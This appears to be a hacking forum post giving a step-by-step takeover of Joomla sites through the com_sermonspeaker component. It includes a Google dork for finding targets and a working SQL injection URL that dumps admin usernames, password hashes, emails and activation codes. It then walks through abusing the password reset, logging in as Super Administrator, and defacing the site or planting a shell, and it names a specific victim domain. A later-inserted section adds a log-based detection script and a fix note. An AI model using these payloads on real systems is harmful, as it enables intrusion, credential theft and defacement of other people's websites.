Step by step Exploit Joomla

OK, let's get straight to the discussion.

==================================

Code:
* Dork : inurl:option=com_sermonspeaker

Code:
* Exploit : /index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
===================================

1. First, search for a target on Google.
Dork : inurl:option=com_sermonspeaker

2. Once you have found a target, try applying the exploit. This time our target is http://loichung.com
[Image: 1.jpg]

3. Apply the exploit directly:
Code:
/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

[Image: 2-1.jpg]

4. The username, email and password are all displayed. Anyone who wants to encrypt the password can go ahead. But this time we will use the forgot-password technique.

Code:
/index.php?option=com_user&view=reset

Just enter the admin's email.
[Image: 3.jpg]

5. Then press submit, and the following will appear:
[Image: 4.jpg]

It asks for an activation code. What now?

Don't worry, let's find the activation code.
Add ,0x3a,activation after 0x3a,email so that it becomes:

Code:
/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email,0x3a,activation)/**/from/**/jos_users/**/

Once ,0x3a,activation has been added after 0x3a,email, the following will appear:

[Image: 5.jpg]

The activation code is displayed; now just paste the activation code.

[Image: 6.jpg]

6. Now press submit again, and the following will appear:
[Image: 7.jpg]

Now enter a new password of your choice. After that, press submit again.

[Image: 8.jpg]

7. Now we log in as admin via:
Code:
http://[site]/[path]/administrator

[Image: 9.jpg]

Enter the admin username and admin password.

[Image: 10.jpg]

And now we have successfully logged in as Super Administrator and can do anything on the site. What comes next is up to you.

Whether you want to:
* Deface its index
* Plant a shell
* Etc.
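
Seen from the server side, the steps above leave a recognisable sequence in the web access log: a non-numeric `id` on `com_sermonspeaker`, then the `com_user` reset page, then `/administrator`, all from one client. The following is an added example, not part of the original post; the combined log format, the client addresses and the function names are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format). The client
# addresses come from documentation ranges and are not real hosts.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2017:10:00:01 +0000] "GET /index.php?option=com_sermonspeaker&task=latest_sermons&id=12 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2017:10:02:10 +0000] "GET /index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/ HTTP/1.1" 200 6044
203.0.113.9 - - [01/Jan/2017:10:03:30 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 3011
203.0.113.9 - - [01/Jan/2017:10:05:02 +0000] "POST /administrator/index.php HTTP/1.1" 303 0
198.51.100.7 - - [01/Jan/2017:10:06:00 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 3011
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')
SQL_WORDS = re.compile(r"\b(union|select|concat|from)\b", re.I)

def classify(url):
    """Return the stage of the chain a request URL belongs to, or None."""
    parts = urlsplit(url)
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}  # parse_qs URL-decodes
    if q.get("option") == "com_sermonspeaker" and "id" in q:
        raw = re.sub(r"/\*.*?\*/", " ", q["id"])  # inline SQL comments act as spaces
        if not re.fullmatch(r"\d+", raw.strip()) and SQL_WORDS.search(raw):
            return "sqli"
    if q.get("option") == "com_user" and q.get("view") == "reset":
        return "reset"
    if parts.path.startswith("/administrator"):
        return "admin"
    return None

def find_takeover_chains(log_text):
    """Map client IP -> ordered stages, tracking only clients that sent the SQLi."""
    stages = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, url, _status = m.groups()
        stage = classify(url)
        if stage == "sqli" or (stage and ip in stages):
            stages.setdefault(ip, []).append(stage)
    return stages

def full_chain(stages):
    """Clients whose stages contain sqli, reset, admin as an ordered subsequence."""
    def ordered(seq):
        it = iter(seq)
        return all(w in it for w in ("sqli", "reset", "admin"))
    return sorted(ip for ip, seq in stages.items() if ordered(seq))
```

A hit from `full_chain` means the admin account's password should be treated as changed by a third party. The underlying fix belongs in the component: handle `id` as an integer and bind it as a query parameter instead of concatenating it into the SQL string.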

For friends who have trouble finding a target, here are targets + the exploit.
© Copyright 2017 Uphik Lamers - All Rights Reserved